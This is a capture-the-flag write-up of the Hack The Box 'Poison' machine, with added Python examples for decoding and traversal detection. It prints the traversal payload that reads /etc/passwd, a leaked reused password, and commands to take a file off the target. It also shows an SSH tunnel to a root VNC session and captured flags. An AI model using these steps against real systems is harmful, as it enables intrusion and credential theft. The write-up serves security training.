Poison-htb-writeup

0x00 Skills covered

Skills in this chapter: base64 decoding, directory traversal, local file inclusion (LFI), password reuse, cracking zip archive passwords, using the vncviewer tool, SSH port forwarding

Reference: https://0xdf.gitlab.io/2018/09/08/htb-poison.html

Reference: https://www.cyberdonald.com/post/hack-the-box-poison

0x01 Getting user access

1. Get the target machine's IP address: 10.10.10.84

2. Scan for open ports

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn --min-rate=10000 -oG allport 10.10.10.84
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-06 10:32 CST
Warning: 10.10.10.84 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.84
Host is up (0.28s latency).
Not shown: 52931 filtered tcp ports (no-response), 12602 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 74.56 seconds


┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80 -Pn --min-rate=10000 10.10.10.84
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-06 10:36 CST
Nmap scan report for 10.10.10.84
Host is up (0.28s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.69 seconds

3. Visiting port 80 shows a PHP site that includes local files (a local file inclusion vulnerability)

http://10.10.10.84/

http://10.10.10.84/browse.php?file=listfiles.php

http://10.10.10.84/browse.php?file=pwdbackup.txt

This password is secure, it's encoded atleast 13 times.. what could go wrong really.. Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0 NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO Ukd4RVdub3dPVU5uUFQwSwo= 

4. Following the hint in the file, base64-decode it 13 times to obtain a password

data=$(cat pwd.b64); for i in $(seq 1 13); do data=$(echo "$data" | tr -d ' ' | base64 -d); done; echo "$data"

Charix!2#4%6&8(0
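As an added illustration (not code from this writeup), here is a Python version of the decode loop that does not need to know the layer count in advance: it strips the whitespace the wrapped text carries, peels one base64 layer at a time, and stops as soon as the data is no longer well-formed base64 or would decode to non-text bytes. The 13-layer sample is constructed by `make_layered` and is not the pwdbackup.txt blob above; `peel_base64` and the other names are this example's own.

```python
import base64
import binascii
import re

# Standard base64 alphabet with optional padding (checked after whitespace is stripped).
_B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")


def _strip_ws(blob: bytes) -> bytes:
    """Remove the spaces and newlines that wrapped base64 text carries inside each layer."""
    return re.sub(rb"\s+", b"", blob)


def looks_like_base64(blob: bytes) -> bool:
    """True if the whitespace-stripped data is a well-formed base64 string."""
    cleaned = _strip_ws(blob)
    return len(cleaned) % 4 == 0 and _B64_RE.match(cleaned) is not None


def _is_text(data: bytes) -> bool:
    """Printable ASCII or whitespace only; used to notice when we decoded one layer too far."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def peel_base64(blob: bytes, max_layers: int = 64):
    """Decode nested base64 repeatedly. Returns (payload, layers_removed).

    Stops when the current data is not valid base64, when decoding would yield
    non-text bytes (so the previous layer was the real payload), or at max_layers.
    """
    current, layers = blob, 0
    while layers < max_layers and looks_like_base64(current):
        try:
            decoded = base64.b64decode(_strip_ws(current), validate=True)
        except binascii.Error:
            break
        if not decoded or not _is_text(decoded):
            break
        current, layers = decoded, layers + 1
    return current, layers


def make_layered(plaintext: bytes, layers: int) -> bytes:
    """Constructed test input: encode `layers` times with 76-column wrapping, like the hint file."""
    data = plaintext
    for _ in range(layers):
        data = base64.encodebytes(data)
    return data


if __name__ == "__main__":
    sample = make_layered(b"constructed-p@ss!", 13)  # constructed value, not the box's password
    payload, n = peel_base64(sample)
    print(f"{n} layers removed -> {payload!r}")
```

The `_is_text` guard matters when the final payload happens to consist only of base64 alphabet characters: without it the loop would decode one layer too far and return binary garbage instead of the password.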

5. At the same time, browse.php turns out to read files from other directories as well (directory traversal)

http://10.10.10.84/browse.php?file=../../../../../../etc/passwd

# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
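The root cause of steps 3 and 5 is a file parameter handed to include()/readfile() without any containment check. As an added example (not code from the box, whose handler is PHP), the Python below shows the check such a handler needs, plus a small detector that flags traversal attempts in web server access logs. The document root `/var/www/html`, the function names and the log lines are all constructed for this example.

```python
import os
import re
from typing import List, Optional
from urllib.parse import unquote


def resolve_in_root(root: str, requested: str) -> Optional[str]:
    """Map a user-supplied file name onto the document root, refusing anything that escapes it.

    This is the check a browse.php-style handler needs before include()/readfile():
    normalise '..' and symlinks with realpath, then require the result to stay under root.
    """
    if "\x00" in requested:  # a NUL byte is never part of a legitimate file name
        return None
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, requested))
    # An absolute name ('/etc/passwd') replaces the root in join(); '../../' walks out of it.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


# Request line inside an Apache common/combined log entry.
_REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
# '../' or '..\' anywhere in the percent-decoded request target.
_TRAVERSAL_RE = re.compile(r"\.\.[/\\]")


def flag_traversal(log_lines: List[str]) -> List[int]:
    """Return the indices of log lines whose request target contains a traversal sequence."""
    flagged = []
    for i, line in enumerate(log_lines):
        m = _REQUEST_RE.search(line)
        if not m:
            continue
        decoded = unquote(m.group(1))  # catch '%2e%2e%2f' as well as literal '../'
        if _TRAVERSAL_RE.search(decoded):
            flagged.append(i)
    return flagged


# Constructed sample log lines (not taken from the box); the requests mirror the ones made above.
SAMPLE_LOG = [
    '10.10.14.5 - - [06/Jan/2024:10:40:12 +0800] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 512',
    '10.10.14.5 - - [06/Jan/2024:10:41:03 +0800] "GET /browse.php?file=../../../../../../etc/passwd HTTP/1.1" 200 2048',
    '10.10.14.5 - - [06/Jan/2024:10:41:30 +0800] "GET /browse.php?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048',
    '10.10.14.5 - - [06/Jan/2024:10:42:40 +0800] "GET /index.php HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for name in ("listfiles.php", "../../../../../../etc/passwd", "/etc/passwd"):
        print(f"{name!r:40} -> {resolve_in_root('/var/www/html', name)}")
    print("suspicious log lines:", flag_traversal(SAMPLE_LOG))
```

An allowlist of the handful of file names the page actually offers (listfiles.php, pwdbackup.txt, and so on) is stronger still than path containment, because it also stops inclusion of files that legitimately live under the document root but were never meant to be served.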

6. Using the password obtained above and a username from this passwd file, try logging in to the target

charix

Charix!2#4%6&8(0

┌──(kali㉿kali)-[~/桌面]
└─$ ssh charix@10.10.10.84
The authenticity of host '10.10.10.84 (10.10.10.84)' can't be established.
ED25519 key fingerprint is SHA256:ai75ITo2ASaXyYZVscbEWVbDkh/ev+ClcQsgC6xmlrA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.84' (ED25519) to the list of known hosts.
(charix@10.10.10.84) Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories: https://www.FreeBSD.org/security/
FreeBSD Handbook: https://www.FreeBSD.org/handbook/
FreeBSD FAQ: https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums: https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with: pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed: freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages: man man
FreeBSD directory layout: man hier

Edit /etc/motd to change this login announcement.
You can often get answers to your questions about FreeBSD by searching in the
FreeBSD mailing list archives at

http://www.FreeBSD.org/search/search.html
charix@Poison:~ % id
uid=1001(charix) gid=1001(charix) groups=1001(charix)

7. Get the contents of the first flag, user.txt

charix@Poison:~ % pwd
/home/charix
charix@Poison:~ % ls
secret.zip user.txt
charix@Poison:~ % cat user.txt
eaacdfb2d141b72a589233063604209c
charix@Poison:~ %

0x02 Getting root access

8. There is a secret.zip archive in the user's home directory; serve it with a Python web server and download it

charix@Poison:~ % ls -la
total 48
drwxr-x--- 2 charix charix 512 Mar 19 2018 .
drwxr-xr-x 3 root wheel 512 Mar 19 2018 ..
-rw-r----- 1 charix charix 1041 Mar 19 2018 .cshrc
-rw-rw---- 1 charix charix 0 Mar 19 2018 .history
-rw-r----- 1 charix charix 254 Mar 19 2018 .login
-rw-r----- 1 charix charix 163 Mar 19 2018 .login_conf
-rw-r----- 1 charix charix 379 Mar 19 2018 .mail_aliases
-rw-r----- 1 charix charix 336 Mar 19 2018 .mailrc
-rw-r----- 1 charix charix 802 Mar 19 2018 .profile
-rw-r----- 1 charix charix 281 Mar 19 2018 .rhosts
-rw-r----- 1 charix charix 849 Mar 19 2018 .shrc
-rw-r----- 1 root charix 166 Mar 19 2018 secret.zip
-rw-r----- 1 root charix 33 Mar 19 2018 user.txt
charix@Poison:~ % cat secret.zip | base64 -w 0
base64: Command not found.
charix@Poison:~ % base64 -h
base64: Command not found.
charix@Poison:~ % python3 -m http.server 8000
python3: Command not found.
charix@Poison:~ % python -m http.server 8000
/usr/local/bin/python: No module named http
charix@Poison:~ % python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
10.10.14.5 - - [06/Jan/2024 04:11:50] "GET / HTTP/1.1" 200 -
10.10.14.5 - - [06/Jan/2024 04:11:51] code 404, message File not found
10.10.14.5 - - [06/Jan/2024 04:11:51] "GET /favicon.ico HTTP/1.1" 404 -
10.10.14.5 - - [06/Jan/2024 04:12:05] "GET /secret.zip HTTP/1.1" 200 -
10.10.14.5 - - [06/Jan/2024 04:13:01] "GET /secret.zip HTTP/1.1" 200 -

┌──(kali㉿kali)-[~/桌面]
└─$ wget http://10.10.10.84:8080/secret.zip
--2024-01-06 11:13:01-- http://10.10.10.84:8080/secret.zip
正在连接 10.10.10.84:8080... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:166 [application/zip]
正在保存至: “secret.zip”

secret.zip 100%[=========================>] 166 --.-KB/s 用时 0s

2024-01-06 11:13:01 (8.52 MB/s) - 已保存 “secret.zip” [166/166])

9. Extract the file locally to inspect it

┌──(kali㉿kali)-[~/桌面]
└─$ unzip secret.zip
Archive: secret.zip
[secret.zip] secret password:
skipping: secret incorrect password

10. It requires a password, so try cracking it

┌──(kali㉿kali)-[~/桌面]
└─$ zip2john secret.zip > hashzip
ver 2.0 secret.zip/secret PKZIP Encr: cmplen=20, decmplen=8, crc=77537827 ts=9827 cs=7753 type=0

┌──(kali㉿kali)-[~/桌面]
└─$ john hashzip
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 3 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
0g 0:00:04:21 3/3 0g/s 31310Kp/s 31310Kc/s 31310KC/s p0022/0p..p0p0281d
Session aborted

11. Cracking does not succeed, so reuse the current user's password, which extracts the archive successfully

Charix!2#4%6&8(0

┌──(kali㉿kali)-[~/桌面]
└─$ unzip secret.zip
Archive: secret.zip
[secret.zip] secret password:
extracting: secret

12. Checking the file type, this appears to be a password file

┌──(kali㉿kali)-[~/桌面]
└─$ file secret
secret: Non-ISO extended-ASCII text, with no line terminators

13. Back in the initial user shell, check the running processes

charix@Poison:~ % netstat -an -p tcp
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 44 10.10.10.84.22 10.10.14.5.56966 ESTABLISHED
tcp4 0 0 127.0.0.1.25 *.* LISTEN
tcp4 0 0 *.80 *.* LISTEN
tcp6 0 0 *.80 *.* LISTEN
tcp4 0 0 *.22 *.* LISTEN
tcp6 0 0 *.22 *.* LISTEN
tcp4 0 0 127.0.0.1.5801 *.* LISTEN
tcp4 0 0 127.0.0.1.5901 *.* LISTEN
charix@Poison:~ % ps -auwwx | grep vnc
root 529 0.0 0.9 23620 8868 v0- I 03:31 0:00.04 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1
charix 1054 0.0 0.0 412 328 1 R+ 05:39 0:00.00 grep vnc
charix@Poison:~ %
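The point of the listing above is which services are bound only to loopback: Xvnc was started with `-localhost`, so port 5901 is invisible from the network but still reachable by any local account, which is exactly what the SSH tunnel in the next step relies on. As an added example (not code from the writeup), the Python below parses FreeBSD `netstat -an -p tcp` output and reports the loopback-only listeners; the sample text is copied from the output above and `parse_listeners`/`loopback_only_ports` are this example's own names.

```python
from typing import List, Tuple

# Copied from the `netstat -an -p tcp` output above. FreeBSD separates address and
# port with a dot, and '*' means the socket is bound on every interface.
NETSTAT_OUTPUT = """\
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 44 10.10.10.84.22 10.10.14.5.56966 ESTABLISHED
tcp4 0 0 127.0.0.1.25 *.* LISTEN
tcp4 0 0 *.80 *.* LISTEN
tcp6 0 0 *.80 *.* LISTEN
tcp4 0 0 *.22 *.* LISTEN
tcp6 0 0 *.22 *.* LISTEN
tcp4 0 0 127.0.0.1.5801 *.* LISTEN
tcp4 0 0 127.0.0.1.5901 *.* LISTEN
"""

WILDCARDS = {"*", "0.0.0.0", "::"}
LOOPBACK_PREFIXES = ("127.", "::1")


def parse_listeners(text: str) -> List[Tuple[str, str, int]]:
    """Return (proto, address, port) for every TCP socket in LISTEN state."""
    listeners = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or not parts[0].startswith("tcp") or parts[-1] != "LISTEN":
            continue  # header lines and established connections
        addr, port = parts[3].rsplit(".", 1)
        listeners.append((parts[0], addr, int(port)))
    return listeners


def loopback_only_ports(listeners: List[Tuple[str, str, int]]) -> List[int]:
    """Ports bound only to loopback: not reachable from the network directly, but
    reachable by any local account, including through an `ssh -L` tunnel from that account."""
    exposed = {port for _, addr, port in listeners if addr in WILDCARDS}
    local = {port for _, addr, port in listeners if addr.startswith(LOOPBACK_PREFIXES)}
    return sorted(local - exposed)


if __name__ == "__main__":
    found = parse_listeners(NETSTAT_OUTPUT)
    for proto, addr, port in found:
        print(f"{proto:5} {addr:>10}:{port}")
    print("loopback-only:", loopback_only_ports(found))
```

For a defender the lesson is that a loopback bind is an exposure reduction, not an access control: a root-owned VNC server on 127.0.0.1 is only as safe as the credential that protects it and the permissions on the file that stores that credential.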

14. A VNC process is found; next, use ssh to forward its port to the local machine

┌──(kali㉿kali)-[~/桌面]
└─$ ssh -L 9999:127.0.0.1:5901 charix@10.10.10.84
(charix@10.10.10.84) Password for charix@Poison:
Last login: Sat Jan 6 04:05:32 2024 from 10.10.14.5
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories: https://www.FreeBSD.org/security/
FreeBSD Handbook: https://www.FreeBSD.org/handbook/
FreeBSD FAQ: https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums: https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with: pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed: freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages: man man
FreeBSD directory layout: man hier

Edit /etc/motd to change this login announcement.
FreeBSD is started up by the program 'init'. The first thing init does when
starting multiuser mode (ie, starting the computer up for normal use) is to
run the shell script /etc/rc. By reading /etc/rc and the /etc/rc.d/ scripts,
you can learn a lot about how the system is put together, which again will
make you more confident about what happens when you do something with it.
charix@Poison:~ %

15. Locally, log in to that service with the vncviewer tool and the secret file extracted from the archive

┌──(kali㉿kali)-[~/桌面]
└─$ vncviewer 127.0.0.1:9999 -passwd secret
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

16. The root flag is obtained

root@Poison:~ # id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
root@Poison:~ # id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
root@Poison:~ # cat /root/root.txt
716d04b188419cf2bb99d891272361f5
root@Poison:~ #

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/132


https://sh1yan.top/2024/01/06/Poison-htb-writeup/
Author: shiyan
Published: 6 January 2024